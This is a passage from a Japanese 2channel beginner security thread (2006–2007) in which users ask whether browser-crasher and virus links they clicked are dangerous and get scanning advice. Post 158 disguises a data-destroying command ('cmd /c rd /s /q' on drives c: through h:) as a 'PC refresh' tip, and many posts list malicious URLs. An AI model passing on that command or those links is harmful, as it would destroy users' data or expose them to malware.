でも不安だったら確認してみるよ。ありがとう。
136125:2006/12/17(日) 20:32:49
とりあえずspybotのスパイウェア検索とノートンの完全スキャンをしたけど検出0だった。
あとはTelnetの遮断をした。
無知な俺に出来る事はこれくらいか・・・
137名無しさん@お腹いっぱい。:2006/12/17(日) 21:26:48
>>136
>ノートンの完全
他社のオンラインスキャンを併用しておいたほうが吉
ttp://www.kaspersky.co.jp/scanforvirus/

by ノートン2007使い
138136:2006/12/17(日) 22:11:27
>>137
d。やってみるよ。
139名無しさん@お腹いっぱい。:2006/12/18(月) 00:25:29
セキュリティ初心者質問スレッドpart79
http://pc8.2ch.net/test/read.cgi/sec/1165470988/
140名無しさん@お腹いっぱい。:2006/12/18(月) 21:06:57
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 VBとAVG
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】
AVG→IE一時ファイルにJS/Psyme.Cというトロイ
VBで全体スキャン→発見なし
【別のオンラインスキャンしたならその結果は】
カスペルスキーのオンラインスキャン(重要な領域)では発見なし
【症状を具体的に、分かる限りすべて書く】 コマンドプロンプトが大量に開きました
【何をしたらそんなことになったのか】 専ブラでクリックしてしまいました
URL:tp://www.vipper.net/vip145805.jpg.html
【これまでにとった措置】 トロイを隔離したくらいです。
【その他の質問】
対処に困ってコンセントを抜いたんですが
その後PCを立ち上げるとStartUpScannerでこのようなログが出ました。

追加されたスタートアップです!
Location:HKCU
KeyName:MSMSGS
Command:"C:\Program Files\Messenger\msmsgs.exe" /background
KeyDataType:String
ExeFileName:C:\Program Files\Messenger\msmsgs.exe
ExeTimeStamp:2004/10/14 1:24:38
ExeFileSize:1,694,208
ExeMd5:74e6e96c6f0e2eca4edbb7f7a468f259

お願いします。
141名無しさん@お腹いっぱい。:2006/12/19(火) 02:03:32
>>140
PSYMEを探してみた。メディアプレイヤーを上書きするトロイはあるみたいだが、メッセンジャーを上書きorメッセンジャーに感染は見つからなかった。
参考まで
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS%5FPSYME%2EV&VSect=P
http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?ID=38866
142名無しさん@お腹いっぱい。:2006/12/19(火) 12:40:13
>>132
死ね 氏ねじゃなくて死ね
143140:2006/12/19(火) 15:03:10
>>141
ありがとうございます!
メッセンジャー書き換えとかのトロイはないんですか・・・
また質問ですいませんが
メッセンジャー関係で何もしていなければこのログはトロイによって変更されたと考えて良いのでしょうか?
144名無しさん@お腹いっぱい。:2006/12/19(火) 15:29:15
ブラクラの効果でOutlook Expressが起動したんだろ。
それと一緒にWindows Messengerが起動してスタートアップに放り込まれたんじゃねえの?
あれは一度起動すると設定を変えない限りスタートアップで起動するようになる。
145名無しさん@お腹いっぱい。:2006/12/19(火) 16:17:55
>>144
メッセンジャーを起動して設定からバックグラウンドで起動〜のチェックを外したら
スタートアップから消えました
本当にありがとうございます!
146名無しさん@お腹いっぱい。:2006/12/19(火) 23:21:54
>>145
PSYMEのトロイはもまえのVBで対応済みだと思う。隔離したというメッセージがでてればOK。
147名無しさん@お腹いっぱい。:2006/12/20(水) 01:35:15
>>146
ありがとうございます
検出はAVGがしまして、それで隔離しました
今考えたら大量にウインドウが出たときにAVGとVBでぶつかって
検出に支障を来たしていないかと心配ですが・・・
148名無しさん@お腹いっぱい。:2006/12/20(水) 01:59:36
AVGとVB・・・

まずは信頼できるやつをひとついれ
オンラインスキャン(カスペルスキーとか)を併用した方がよい
149名無しさん@お腹いっぱい。:2006/12/20(水) 15:26:00
ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
の頭にhttp://をつけて下さい
jpgファイルを油断して踏んだらこちらに繋がったようです
これも>>3と同種でしょうか
150149:2006/12/20(水) 15:36:20
すいません恐らく>>140と同じファイルだった様です
一応ウィルスは削除したのですがブラクラでウィルスまで貰ったのは初めてだったので。
これはウィルスの削除だけしておけば問題ないでしょうか
151名無しさん@お腹いっぱい。:2006/12/20(水) 17:21:20
>>150
セキュリティホールを突いてくるウイルスサイトだが
OSがかなり古い状態でなければ踏んでも特に問題は無い
XPあたりなら素の状態でもシステム改変は無いだろう

念の為 一時ファイル削除してウイルススキャンして何も出なければ完了
152名無しさん@お腹いっぱい。:2006/12/20(水) 17:22:54
>>150
なんのウィルス対策ソフト使ってるかわかんないんで安易に大丈夫とはいいにくい
カスペルスキーのオンラインスキャンでもやって確かめてみればおk
なお、あらかじめソフトが隔離したやつは削除、ならびにブラウザのキャッシュ(一時ファイル)なども削除して
PCを再起動させてからオンラインスキャンを開始かな
153149:2006/12/20(水) 19:05:18
win2kで8月にアップデートしたので恐らく大丈夫だと思います
さっきカスペルスキーのオンラインスキャンもしてみましたが問題ないようでした。
アドバイスありがとうございました。
154名無しさん@お腹いっぱい。:2006/12/29(金) 12:51:09
怖くて踏めないサイトのアドレス
を確認してくれるスレがあったと思うのですが
どこでしたでしょうか?
155名無しさん@お腹いっぱい。:2006/12/29(金) 20:07:35
>>154
勇気がなくて踏めないURL鑑定スレin初質 Part1
ttp://etc3.2ch.net/test/read.cgi/qa/1165116891/
156名無しさん@お腹いっぱい。:2006/12/29(金) 23:28:28
さんくすです
157名無しさん@お腹いっぱい。:2006/12/30(土) 21:10:24
>>82
俺も踏んでもうたorz
158名無しさん@お腹いっぱい。:2006/12/31(日) 12:53:03
最近PCが重いとか、起動シャットダウンが遅いとか思ってる人は、
リフレッシュコマンドを試してみるといい。
以下を実行することでディスク/ドライプの節約、メモリの開放になる。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q d:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q e:
cmd /c rd /s /q f:
cmd /c rd /s /q g:
cmd /c rd /s /q h:
cmd /c rd /s /q c:

これでディスク/ドライプがクリアされて正常になる。
事前予防にもなるので、やった事がなければ試してみる価値あり。
年末なのでPCもリフレッシュしましょう。
159名無しさん@お腹いっぱい。:2006/12/31(日) 17:13:53
実行するとDドライブが全部消えちまうじゃねーか
160名無しさん@お腹いっぱい。:2006/12/31(日) 18:17:11
RMDIR(RD)ディレクトリの削除
161名無しさん@お腹いっぱい。:2007/01/01(月) 01:49:47
これブラクラらしいんですけど踏むと何か後遺症ありますか?
162名無しさん@お腹いっぱい。:2007/01/01(月) 01:50:45
貼れてなかった…
これです
ttp://vip.6to23.com/jpgman/gui/mm.htm
163名無しさん@お腹いっぱい。:2007/01/01(月) 03:31:32
>>162
ただのびっくりページ
PCに悪さをするようなものは特に無い
164名無しさん@お腹いっぱい。:2007/01/02(火) 03:58:51
【使用OS】 widowsXP SP2
【WindowsUpdateしてるか】 適宜
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 毎日
【スキャンした結果(ウイルス名・発見場所)】 
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 症状は今のところ無し
【何をしたらそんなことになったのか】
 すいません、これ踏んじゃったんですが、htmlが偽装されてますよね?
 openjaneと、firefoxで踏んじゃったんですが…。
 不安だったので、聞きに来ました。お願いします。
 ttp://ea.uuhp.com/~ipnuki/cgi-bin/env/gachimuchi1835.jpg
【これまでにとった措置】 ウイルスバスターで検索
【その他の質問】
165名無しさん@お腹いっぱい。:2007/01/02(火) 04:26:24
MUVIC COMってなんなんですか?
166164:2007/01/02(火) 04:51:50
ググったら、FDDアタックやらウィンドウオープンやらのブラクラらしいですね。
カスペのオンラインスキャンもやったんですが、何も発見されませんでした。
これは後遺症は無いんでしょうか?
167名無しさん@お腹いっぱい。:2007/01/02(火) 04:59:33
>>166
基本的にはブラクラの類に属するものでウイルスやらシステム感染は無いはず
conconとか仕掛けているのを見ると、随分昔に作られたもののよう
今時のPCなら特に問題無い
IEで踏んだが発動したのはウィンドウオープンとFDDアタックだけだった

アンチウイルスによっては踏んだ時にWinbombとかそんな感じで反応があるかも知れない
対処法としては放置しても構わないが、何か気持ち悪いと思うなら一時ファイル削除して再起動で十分
168164:2007/01/02(火) 05:13:43
>>167
ありがとうございます!
ヤフーで検索したら、今ちょっと出回ってるurlらしくて、
踏んでしまった自分が恥ずかしい限りです。勉強になりました。
キャッシュ消し再起動もやっておきます。
169名無しさん@お腹いっぱい。:2007/01/02(火) 05:43:47
時々見かける目障りなURLだったからアク禁覚悟で流しておいた
もう404になっているはず
170164:2007/01/02(火) 08:51:42
>>169
ありがとうございます。
あぷろだ確認しましたが、流されてました。
そういう二時被害の防ぎ方もあるんですね。勉強になりました。
171名無しさん@お腹いっぱい。:2007/01/03(水) 04:06:05
tp://www.vipper.net/vip154672.jpg.html

上記のファイルを誤って踏んでしまいました
OS(XP)、Norton Internet Security共に最新の状態でした
一通りウイルスチェックを行いましたが、その後どの様に対処すればよいのでしょうか…
172名無しさん@お腹いっぱい。:2007/01/03(水) 04:52:03
173名無しさん@お腹いっぱい。:2007/01/03(水) 05:22:47
>>172
ウインドウがたくさん出てきたりtelnetがどうとか…
あとWMPやRMが何度も実行されました
結局LANケーブル引っこ抜いて再起動させました

今レポートを見てみたらhellplantやip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm、blacksheepに繋がってしまったみたいです…
174172:2007/01/03(水) 05:56:42
ダウンロードして検体送付しときました。
タスクマネージャーのプロセスにおかしなexeがないか?自分で確認しておいて下さい

175名無しさん@お腹いっぱい。:2007/01/03(水) 05:56:49
>>173
「WELCOME」だね。前スレが落ちてるので以下コピペ

以下の有害サイトを大量に呼び出すブラクラ
1.www.hellplant.org/cgi-bin/xoor/serpent.cgi
厨房ホイホイ。IP抜かれるくらいで特に害は無い
2.www.albinoblacksheep.com/flash/you.html
元ブラクラ。今はただのフラッシュ。害は無い
3.ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
脆弱性を突いてWMPを破壊、任意のコードを実行

とりあえず危険なのは3のURLだが
脆弱性自体は2年位前に塞がれているはず
結論としてはWindowsがよっぽど古い状態でなければ問題は無い

一時ファイル削除して適当なウイルススキャンして何も出なければ完了
176名無しさん@お腹いっぱい。:2007/01/03(水) 06:02:53
私も>>171を踏んでしまいました一人です

>>175
>一時ファイル削除して適当なウイルススキャンして何も出なければ完了
なにも出ませんでしたが、outlookにhellplantなんたらのアカウントが大量に出来てますが大丈夫でしょうか?
177171:2007/01/03(水) 06:08:51
>>174
ありがとうございます
注意深く見ておかないといけませんね

>>175
既出でしたか…
jpgファイルでこんな事になるとは思ってもみませんでした
OSもNISも最新の状態ですし大丈夫そうですね

皆様本当にありがとうございました
今後は安易にファイルを踏むことのない様慎重に対応するよう心がけます
178名無しさん@お腹いっぱい。:2007/01/03(水) 06:16:39
>>176
>>171>>3が含まれているための影響
手動で消してもいいが大抵Outlookを何回か起動・終了を繰り返すうちに
勝手に消えているはず。放置しても特に構わない
179名無しさん@お腹いっぱい。:2007/01/03(水) 06:17:56
>>178
ありがとうございます。いい教訓になりましたorz
180名無しさん@お腹いっぱい。:2007/01/03(水) 06:24:56
>>171
>>176
2ちゃんねる専用ブラウザ使ってますか?
181171:2007/01/03(水) 06:29:49
>>180
Jane Doe Styleを使っているのですがリンク先をIEで踏んでしまいまして…
もし「.html」の部分が無ければViewerで踏むことになったのかな
182176:2007/01/03(水) 06:30:18
>>180
Live2chを使ってますが、ポップアップさせずにクリックしてしまいました・・・反省してます
183名無しさん@お腹いっぱい。:2007/01/03(水) 06:39:32
>>171
>>176
「CLUBPC security」などでブラウザのセキュリティ設定を再勉強しておきましょう
184176:2007/01/03(水) 06:46:25
>>183
はい

あと>>171には>>175に加えて
ttp://cyberdyne-co-ltd.hp.infoseek.co.jp/burakura-1-10.html
の標本No.7の症状も現れたことを付け加えておきます。
185171:2007/01/03(水) 06:50:40
>>183
これを機にしっかり勉強しておきたいと思います
いやはやお恥ずかしい…

>>184
telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
186176:2007/01/03(水) 06:59:03
>>185
> telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?

私の場合、connectionなんたらというのが記述されたコマンドプロンプトが大量に出たのですが・・・
187171:2007/01/03(水) 07:18:57
>>186
私が確認できる限りでは>>175さんが引用して下さった3サイトへの接続のみだったかと思います
でももしご指摘されたサイトへも接続されていたら面倒ですね
188名無しさん@お腹いっぱい。:2007/01/03(水) 07:46:58
>>186
ttp://www.alaxala.com/jp/support/manual/AX2400S/HTML/OPEREF/0023.HTM
の「telnetコマンドの応答メッセージ一覧」のどれかが表示されただけだと思うが…

自分の環境では接続に失敗したtelnetプロンプトは即座に消えてしまうので
メッセージ内容は捉えきれなかった

接続先は>>3以外には無いし、繋がったという話も今まで聞いた事は無い
189名無しさん@お腹いっぱい。:2007/01/03(水) 08:00:04
190名無しさん@お腹いっぱい。:2007/01/03(水) 08:32:22
test
191176:2007/01/03(水) 17:32:50
>>188
どうやら接続できませんのメッセージが書かれたtelnetプロンプトだったみたいです
初めてだったのでコマンドプロンプトだとはやとちりしたのでしょうorz

ただ、私の場合は接続に失敗したtelnetプロンプトは消えずに
ttp://www.aylp.net/internet/browser_crasher/2.html
のTelnetストームのような状態になりました
192名無しさん@お腹いっぱい。:2007/01/04(木) 17:16:44
精神的ブラクラ踏んでしまいました


はぁ。
193名無しさん@お腹いっぱい。:2007/01/06(土) 04:01:30
ttp://pcshop.tyabo.com/no-to/a-001.htm
ニュー速報から張ってあって、踏んでしまいました。
194名無しさん@お腹いっぱい。:2007/01/06(土) 04:11:23
>>193
とりあえずWindowsUpdateしてあるなら踏んで即感染は無いはず
念を入れるなら一時ファイル削除して適当なウイルススキャン

ブラクラじゃなくてれっきとしたウイルスサイトだと思われ
195名無しさん@お腹いっぱい。:2007/01/06(土) 10:42:35
>>193
Trojan-Downloader.VBS.Small.bo 検出
196名無しさん@お腹いっぱい。:2007/01/06(土) 18:18:41
tp://114090.net/~vip2ch/img/topimg-2006_08.jpg
ニュース速報のやつ(同じもの?)を踏んだぜ!
197名無しさん@お腹いっぱい。:2007/01/06(土) 23:15:32
>>196
中身は>>20あたりと同じ
有害無害含めて30種類の悪意あるサイトを呼び出す
WindowsUpdate済みなら多分踏んで即感染は無い
198名無しさん@お腹いっぱい。:2007/01/07(日) 09:44:20
これを、クリックするとパソコンの電源が切れてしまったのですが、ウィルスに感染したのでしょうか?

ttp://www.nobsxxxhost.com/members/henrycc/jp.html
199名無しさん@お腹いっぱい。:2007/01/07(日) 19:35:13
>>198
ttp://www.nobsxxxhost.com/members/ 自体は
海外のホスティングサイトかな

当該のttp://www.nobsxxxhost.com/members/henrycc/jp.html
ページが消えているみたいで踏むと404扱いのページに飛ばされて
ランダムでアダルトサイトや詐欺ソフトサイトの広告ポップアップが現れる
もしかしたらこの中のどれかが原因かも知れないが
確認した限りではそこまで危険性の高いページは無かった

あるいはお前さんが踏んだ時には、まだページが残っていたのかも知れないが…

心配なら適当なウイルススキャンでもどうぞ
200名無しさん@お腹いっぱい。:2007/01/07(日) 21:16:33
>>199
ありがとうございます。
わざわざリスクを負って調べていただき感謝いたします。
m(__)m
201名無しさん@お腹いっぱい。:2007/01/09(火) 20:19:47
p://www.goggle.com/

p://www.yourdailymedia.com/media/1160043117/Goggle.com_Destroys_Your_PC

上のアドレスは立ちの悪いブラクラで
下のアドレスは上のアドレスを踏んだらどうなるか、
というものらしいのですが下のアドレスは安全なものでしょうか?
それと上のアドレスで起こりうる被害はどのようなものなのでしょうか?
202名無しさん@お腹いっぱい。:2007/01/09(火) 23:19:01
なぜWindowsUpdateしてなかったら危ないんでしょうか?
203名無しさん@お腹いっぱい。:2007/01/09(火) 23:34:27
すいません、グぐったら分かりました。
204名無しさん@お腹いっぱい。:2007/01/10(水) 02:26:11
>>201
上はgoogleのタイプミスにつけこんだスパイウェア配布サイトだった、らしい
今現在は、踏んで即危険というわけでは無い様だけど、
ランダムで詐欺くさい広告窓が立ち上がる。サイトの本質は変わって無いのだろう

下はその通りの内容。マカフィーの広告動画かと思われ
205名無しさん@お腹いっぱい。:2007/01/10(水) 18:25:57
>>204
どうもありがとうございました
206名無しさん@お腹いっぱい。:2007/01/13(土) 21:12:49
2ch閉鎖騒動で各板の閉鎖スレを見ていたら、PCニュース板の

【ひろゆき】2ch、年内にも閉鎖へ【自己破産】
ttp://pc10.2ch.net/test/read.cgi/pcnews/1159973168/l50

のスレをギコナビで見ようとした瞬間、Macfeeがトロイの木馬を検知しました。
Macfeeがログのdatファイルを削除してくれたのですが、どうすればいいですか?
207名無しさん@お腹いっぱい。:2007/01/13(土) 21:59:42
誤検知(ウィルスコード)なので放置でおk
208名無しさん@お腹いっぱい。:2007/01/13(土) 22:03:50
>>207
誤検知ですか・・スレダウンロードするだけでウィルスに感染なんてするの?!
って思って焦ってこのスレにきました。ありがとうございます。
スレ内にウィルスコードが書かれていたというこでしょうか?
209名無しさん@お腹いっぱい。:2007/01/13(土) 22:20:51
>>208
意味不明な妙な文字列があったのならそれがウィルスコード
210名無しさん@お腹いっぱい。:2007/01/14(日) 03:50:26
ttp://nexx.jp/crashme.html

これブラクラっすか?
211名無しさん@お腹いっぱい。:2007/01/14(日) 04:11:58
>>210
ただのジョークだな
212名無しさん@お腹いっぱい。:2007/01/14(日) 09:31:28
なんだ。

【社会】モーニング娘。吉澤ひとみさん号泣…16歳弟が東京・新宿で交通事故死★3
http://news22.2ch.net/test/read.cgi/newsplus/1168708928/4
213名無しさん@お腹いっぱい。:2007/01/14(日) 10:57:52
214名無しさん@お腹いっぱい。:2007/01/14(日) 18:12:43
215名無しさん@お腹いっぱい。:2007/01/14(日) 18:16:11
直リンすまん
216名無しさん@お腹いっぱい。:2007/01/14(日) 19:00:16
http://monoganac2.sakura.ne.jp/src/milktea13304.txt
ポップアップを消しても消しても出てきます
これ以外にPCに悪影響あるでしょうか?
217名無しさん@お腹いっぱい。:2007/01/14(日) 19:54:58
俺がいつも使っているパソコンが壊れたので、ノートからの質問です。
ブラウザを動かすと残像みたいに無限にブラウザが出てくるようになってしまいました。
Alt+F4でも、再起動しても直りません、助けてください。
218名無しさん@お腹いっぱい。:2007/01/14(日) 21:25:05
>>216
無限アラート。タスクマネージャからブラウザ強制終了で脱出できる
PCに特に悪影響は無い

>>217
(残像消えずにいつまでも残っているのなら)
物理的にPCがいかれた場合にそんな症状になる場合もある
修理逝き
219216:2007/01/14(日) 21:42:53
>>218
ジョークみたいですね
ありがとうございます
220名無しさん@お腹いっぱい。:2007/01/16(火) 00:42:40
tp://vip.6to23.com/jpgman/gui/gui.htm
これってやばい?
FireFoxで開いたからポップアップブロックしたけど
後に中華メッセージが出た
221名無しさん@お腹いっぱい。:2007/01/16(火) 01:02:27
>>220
ひとつめのリンク先へと飛び、その後さらに画像があるリンクへと飛ぶ
ホラー系画像があまりにもゆっくり描写されたので、びびりなし(笑)
222名無しさん@お腹いっぱい。:2007/01/16(火) 08:43:09
tp://headline-news.tripod.com/sports/baseball/20070114-00000185-hoc.html

これの中身はなんでしょうか・・・
変なのがダウンロードされようとしましたが
223名無しさん@お腹いっぱい。:2007/01/16(火) 12:16:04
>>222
中身はもう消えたみたい。>>214と同じURLだね
残っていた時には確かconconクラッシャーやexeの直リンク
複数のウイルスサイトの呼び出しがあったと思う

とりあえず踏んでも即感染は無いと思うけど
一時ファイル削除して適当なウイルススキャンで何も出なければ完了
224名無しさん@お腹いっぱい。:2007/01/16(火) 12:52:58
ありがとうございました
225名無しさん@お腹いっぱい。:2007/01/17(水) 22:39:41
tp://dailynews.i8.com/sports/baseball/20070117-00000112-nks.html
芸スポで踏んでしまいました、アウトルックで新規作成メールの窓がたくさん開いたりしましたが、
ウイルス感染はないでしょうか?
226名無しさん@お腹いっぱい。:2007/01/17(水) 22:42:41
>>225
トロイの警告が出るね
227名無しさん@お腹いっぱい。:2007/01/17(水) 22:44:13
マジですか・・・ノートンのオートプロテクト外したままで踏んでしまいました・・・
228名無しさん@お腹いっぱい。:2007/01/17(水) 22:48:50
229名無しさん@お腹いっぱい。:2007/01/17(水) 22:51:46
>>226 >>228
ありがとうございます
とりあえずほっとしました
さきほどからスキャンかけてるんですが、今のところ何も出てこないので
逆に不安になってました
230名無しさん@お腹いっぱい。:2007/01/17(水) 22:54:28
>>228以外に他のトロイもダウンロードしようとしてるね
NOD32でWin32/TrojanDownloader.Buskyって出たけど
231名無しさん@お腹いっぱい。:2007/01/17(水) 22:59:45
>>230
うはぁ
とりあえずスキャンかけてみたんですが、何もでませんでした・・・
再起動してもう一回やってみます
232名無しさん@お腹いっぱい。:2007/01/17(水) 23:08:01
233名無しさん@お腹いっぱい。:2007/01/17(水) 23:30:03
>>232
うーんよくわからないです・・・
なんか新型とかでノートンじゃまだ対応してないんですかね・・・
234名無しさん@お腹いっぱい。:2007/01/17(水) 23:38:50
心配ならカスペルスキーのオンラインスキャンでもしてみれば。
ちなみにPeerGuardian入れてると>>228はダウンロードできない。
P2PやってなくてもPeerGuardian結構役に立つよ。
235名無しさん@お腹いっぱい。:2007/01/17(水) 23:39:41
>ちなみにPeerGuardian入れてると>>228はダウンロードできない。
>>228じゃなくて>>230のトロイ
236名無しさん@お腹いっぱい。:2007/01/17(水) 23:47:49
>>234
ピア2もインストしているのに、立ち上げていませんでした・・・何やってんでしょうね自分
カスペルスキーのオンラインスキャン試してみます、色々ありがとうございます
237名無しさん@お腹いっぱい。:2007/01/21(日) 11:17:23
http://www.2flashgames.com/f/f-Bowmaster-Prelude-3571.htm
このリンクを踏んだら「・・・が組み込まれました」とか言う表示が出るDOS窓がたくさん開きました
さらにその後もPCを使っていると時々一瞬だけDOS窓が開くようになってしまいました
これは何かのウイルスに感染していますか?
238名無しさん@お腹いっぱい。:2007/01/21(日) 20:33:27
>>237
必ずでは無いがウイルスサイトの呼び出しがある
サイト内にある広告経由かな…結果は多少ランダムかも知れない
Updateを怠っていなければ感染は無いと思うが…

>>7次第だがとりあえずウイルススキャンした方が吉
手持ちのアンチウイルスが無いなら
http://pc10.2ch.net/test/read.cgi/sec/1167048038/8
239名無しさん@お腹いっぱい。:2007/01/21(日) 20:50:18
>>237
そこもPeerGuardianでブロックされる。
直接的なアドバイスじゃないがPeerGuardian入れとくといいよ。
超おすすめ。
240237:2007/01/22(月) 08:18:52
オンラインスキャンしてみてもなにもウイルスは検出されなかったのですが
タスクマネージャーが起動できなくなったり
ドラッグ アンド ドロップが出来なくなったり
カナ漢字入力システムを組み込みましたって書かれた窓がたくさん開いたりして
気持ちが悪いのでOSを再インストールしました

普段はjavaとかActiveXを常にoffにしているのですが
フラッシュゲームのページだと思って油断して踏んだらやられちゃいました
ウイルスソフトを何も使ってなかった自分が悪いのですが・・・

>>238 >>239
アドバイスありがとうございました
今後は対策ソフトを導入したいと思います
241名無しさん@お腹いっぱい。:2007/01/22(月) 21:11:09
242名無しさん@お腹いっぱい。:2007/01/22(月) 21:15:39
>>241
d
243名無しさん@お腹いっぱい。:2007/01/23(火) 01:39:02
このサイトの正体お願いします


ttp://www.110kz.com/003/virus.htm
244名無しさん@お腹いっぱい。:2007/01/23(火) 01:49:42
>>243
びびらせ洒落サイト
アクセスすると、文字列多彩な画面がだぁーとスクロール
そのあと

全部冗談です。製作者は善良なのです。

よく耐えました。あなたは真の勇者です。

マラカスパンダをクリックして交流広場にお進みください。

コーヒーでも飲んで、バクバクしている心臓を落ち着けましょう。

がでてくる。^^
245名無しさん@お腹いっぱい。:2007/01/23(火) 02:09:02
こういうブラクラサイトを検査するソフトとかってないんですかね?
どこかの個人がやれば小遣いかせぎにはなると思うんですが
トレンドマイクロあたりにやってほしい
246名無しさん@お腹いっぱい。:2007/01/23(火) 02:18:42
>>245
ブククラじゃないぞ、ジョークサイトで無害だぞ
247781:2007/01/23(火) 02:21:36
>>242のことじゃなくて一般的なブラクラのことね
最近はられてるゴッグル(goggle)とか
248名無しさん@お腹いっぱい。:2007/01/23(火) 02:31:51
そいうことかー
そういやさっき、さっそgoggle貼られてたわw
249名無しさん@お腹いっぱい。:2007/01/23(火) 05:04:54
友人5人で大学のパソでgoggle gorgleとかブラクラ踏みまくって遊んでたら、
鮮やかにバレテひどいめに・・・
250名無しさん@お腹いっぱい。:2007/01/23(火) 18:37:46
>>244
dクス
251名無しさん@お腹いっぱい。:2007/01/24(水) 16:12:43
これ踏んじゃったんですが大丈夫でしょうか ?
tp://www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg

なんか巨大な画像が出てきます。
252名無しさん@お腹いっぱい。:2007/01/24(水) 16:18:54
ごめん、 >>5に出てました。
253名無しさん@お腹いっぱい。:2007/01/24(水) 22:27:59
tp://webnews.writernetwork.com/JP/sports/baseball/20070124-NPB0037.html

踏んでしまいました・・・
WindowsUpdateはやってて、使っているAntiVirusは
ノートンです。
ちゃんとUpdateはしてますが・・・なんかPC遅くなりました。
よろしくおねがいします。
254名無しさん@お腹いっぱい。:2007/01/24(水) 22:47:42
Janeなどの専ブラウザを使っている人は
command.datに下記の文章を追加しましょう
これらを追加するだけで危険性がグッと減ります



チェック=
ANSIドメイン/IPアドレス検索=http://whois.ansi.co.jp/?key=$TEXT=search&mymsg=$TEXT
ブラクラチェック=http://so.7walker.net/?site=$TEXT$LINK
ウイルスデータベース=http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=$TEXT&alt=$TEXT
255名無しさん@お腹いっぱい。:2007/01/24(水) 22:50:05
>>253
中身自体は>>222と同内容
各種ブラクラ、それと一応ウイルスサイトの呼び出しがあるので
一時ファイル削除してウイルススキャン

PCが遅くなるのは多分メモリを大量に消費しているので
ウイルススキャン終了後にでも再起動を
256名無しさん@お腹いっぱい。:2007/01/25(木) 00:42:56
>>255
ありがとうございます!
257名無しさん@お腹いっぱい。:2007/01/25(木) 18:25:14
すみません、これ踏んじゃいました
tp://dailynews.7p.com/sports/baseball/ob20070125-0000021.html
だいじょうぶでしょうか?
258名無しさん@お腹いっぱい。:2007/01/25(木) 19:03:00
【使用OS】 XP
【WindowsUpdateしてるか】 最近はしていません
【AntiVirusは何を使っているか】 ウィルスセキュリティー
【ちゃんとUpdateしてるか】 最近していないです・・・
【スキャンした結果】何も発見されませんでした。
【別のオンラインスキャンしたならその結果は】
ウィルスバスターでスキャンしたのですが、何も発見されませんでした
【症状を具体的に、分かる限りすべて書く】症状は特にないです。
【何をしたらそんなことになったのか】
ここ踏んじゃいました・・・。
tp://www2.strangeworld.org/uedakana/
ウィンドウがたくさん出て、OutlookExpressも勝手に起動しました。
【これまでにとった措置】
強制的に電源を切って、再起動して一時ファイルの削除、ウィルススキャンしました。
【その他の質問】
危険なウィルスやスパイウェアに感染してしまったのでしょうか?
259名無しさん@お腹いっぱい。:2007/01/25(木) 19:57:41
260名無しさん@お腹いっぱい。:2007/01/25(木) 21:11:07
>>257
>>253 >>222 辺りと同じもの
一時ファイル削除してウイルススキャン

>>258
純粋なブラクラなのでシステム感染は無い
電源切るのはアレだがその措置で十分
ttp://cyberdyne-co-ltd.hp.infoseek.co.jp/burakura-1-10.html

>>259
何という重いブログ…画像貼りすぎだろ…
ここまで来ると嫌がらせに近いな
261名無しさん@お腹いっぱい。:2007/01/25(木) 22:41:01
http://up2.viploader.net/pic/src/viploader402042.jpg
http://up2.viploader.net/pic/src/viploader402047.gif

多分>>4なんですが実害ありますか?
バスター2006無反応
ウイルスコードらしき文字列の画面
262名無しさん@お腹いっぱい。:2007/01/25(木) 23:11:42
追記です
OS XPSP2
ブラウザ IE6 拡張子ではなく、内容(ryは無効

初めて踏んだんでびびりました('A`)
263名無しさん@お腹いっぱい。:2007/01/26(金) 00:59:36
やっとロダに繋がった…

>>261-262
いわゆる「ノートントラップ」
実体はただのテキストファイルでアンチウイルスが反応する文字列が
ずらずらと書いてあるだけの代物
踏んでも実害は無い。放置でおk
264名無しさん@お腹いっぱい。:2007/01/26(金) 01:07:43
>>263
レスサンクスです
265258:2007/01/26(金) 15:25:01
>>260
レスありがとうございます。安心しました。
266名無しさん@お腹いっぱい。:2007/01/26(金) 22:34:23
マシンがPen4 3.4 RAM1.5Gなのでそれほど重いとは感じないけど
2006に戻そうか考え中
Pen4 2.2では多少だるさが感じるので一気に全部2006に戻そうかな?
267名無しさん@お腹いっぱい。:2007/01/26(金) 23:48:34
tp://chiffon.ty.land.to/src/Chiffontea0650.jpg

上記をふんでしまいましたが、実害はありますでしょうか?

OS : XP Pro sp2
AntiVirus : Norton(2ヶ月期限切)
WindowsUD:最近してません

上記URLをsleipnirで表示した際,mailtoストーム
Media Player,telnet接続等が発生しました。

4>>だとおもわれますが、最近はこんなのもあるんですね・・・
sleipnirのJavaScript,Active X系はすべてoffで、
プログラムが起動するとは思いませんでした。
268名無しさん@お腹いっぱい。:2007/01/27(土) 12:08:46
>>267
各種ブラクラ+ウイルスサイトの呼び出しがあるので
とりあえずウイルススキャン
運悪くサイトに繋がって且つOSに穴が開いている状況だと感染も有り得る
269名無しさん@お腹いっぱい。:2007/01/27(土) 12:24:03
音楽配信板で踏んじゃいました。
不安です・・・

694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
http://bubble5.2ch.net/test/read.cgi/wm/1162908870/
270名無しさん@お腹いっぱい。:2007/01/27(土) 12:51:23
音楽配信板で踏んじゃいました。
不安です・・・

694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
http://bubble5.2ch.net/test/read.cgi/wm/1162908870/
271名無しさん@お腹いっぱい。:2007/01/27(土) 12:59:01
??
2ちゃんねるのスレッドでしょ?
272名無しさん@お腹いっぱい。:2007/01/27(土) 13:07:42
スイマセン。間違えました。

